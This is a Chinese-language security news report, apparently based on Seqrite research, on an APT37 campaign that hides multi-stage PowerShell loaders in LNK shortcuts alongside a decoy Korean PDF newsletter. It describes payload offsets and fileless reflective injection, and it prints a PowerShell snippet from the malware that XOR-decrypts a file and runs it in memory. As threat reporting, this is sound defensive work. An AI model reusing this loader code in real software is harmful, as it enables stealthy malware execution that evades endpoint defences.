攻击者开始利用看似无害的 PDF 通讯稿,搭配恶意的 Windows 快捷方式(LNK 文件),入侵企业环境。
该攻击于 2025 年 8 月末出现,以名为 “국가정보연구회 소식지 (52호)”(韩国国家情报研究会通讯稿第 52 期)的合法 PDF 通讯稿为伪装,主要针对韩国的学术机构和政府部门。
受害者会收到一个压缩包,其中既包含作为诱饵的 PDF 文件,也包含一个伪装成通讯稿的配套
.lnk文件。当用户执行该快捷方式时,LNK 文件中嵌入的多阶段 PowerShell 加载器会在内存中完成所有解压和后续有效载荷部署操作,全程不写入磁盘,从而规避基于磁盘的检测机制。
初步分析显示,该 LNK 文件在特定偏移位置隐藏了三个二进制有效载荷:偏移量0x0000102C处为诱饵 PDF,0x0007EDC1处为加载器二进制文件,0x0015AED2处为最终可执行文件。
执行 LNK 文件后,其内部的 PowerShell 单行命令会读取这些偏移位置的数据,将二进制文件以aio0.dat、aio1.dat和aio1+3.b+la+t的文件名写入%TEMP%(系统临时文件夹),随后启动批处理脚本aio03.bat,对加载器进行解码并运行。
Seqrite(安全公司)的分析师指出,这种 “无文件” 攻击方式能让攻击者彻底避免将最终有效载荷写入磁盘,从而绕过基于特征码的防御系统。
Seqrite 研究人员后续调查发现,最终有效载荷经单字节 XOR 密钥(0x35)解密后,会通过GlobalAlloc、VirtualProtect和CreateThread等 Windows API 调用直接注入内存。
这种 “反射型 DLL 注入” 技术能让恶意代码以隐蔽方式执行,几乎不留下取证痕迹。
对加载器二进制文件的详细逆向分析显示,其包含针对 VMware 工具的环境检测以及规避沙箱的程序 —— 这些功能会阻止恶意代码在分析环境中执行,也印证了发起此次攻击的 “APT37”(代号)威胁组织具备高度专业性。
攻击活动 1 的感染链(来源:Seqrite)
powershell$exePath = "$env:temp\tony31.dat"
$exeFile = Get-Content -Path $exePath -Encoding Byte
$key = 0x37
for ($i = 0; $i -lt $exeFile.Length; $i++) {
$exeFile[$i] = $exeFile[$i] -bxor $key # 通过XOR密钥解密文件
}
$buf = [Win32]::GlobalAlloc(0x40, $exeFile.Length) # 分配内存空间
[Win32]::VirtualProtect($buf, $exeFile.Length, 0x40, [ref]$old) # 修改内存保护属性
[Win32]::RtlMoveMemory($buf, $exeFile, $exeFile.Length) # 将解密后的代码写入内存
[Win32]::CreateThread(0, 0, $buf, 0, 0, [ref]$null) # 创建线程执行恶意代码感染机制
当用户双击具有欺骗性的.lnk文件时,感染流程随即启动 —— 该操作会在后台触发 PowerShell。
攻击活动 2 的感染链(来源:Seqrite)
PowerShell 脚本通过Get-Item和ReadAllBytes命令解析自身的二进制内容,提取出诱饵 PDF 并展示给用户,同时暗中准备真实的恶意有效载荷。
有效载荷准备就绪后,批处理加载器会对存储在aio02.dat中的 UTF-8 解码脚本执行Invoke-Expression(调用表达式)命令,该脚本随后会协调完成aio01.dat的 XOR 解密与反射注入操作。
通过利用内存执行技术,攻击者成功避开了依赖磁盘扫描的传统终端防护平台。
这种融合 “诱饵文档、嵌入式有效载荷、无文件技术” 的多层感染链,凸显出国家支持的网络间谍活动正不断升级其技术复杂度。
关键术语补充说明
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论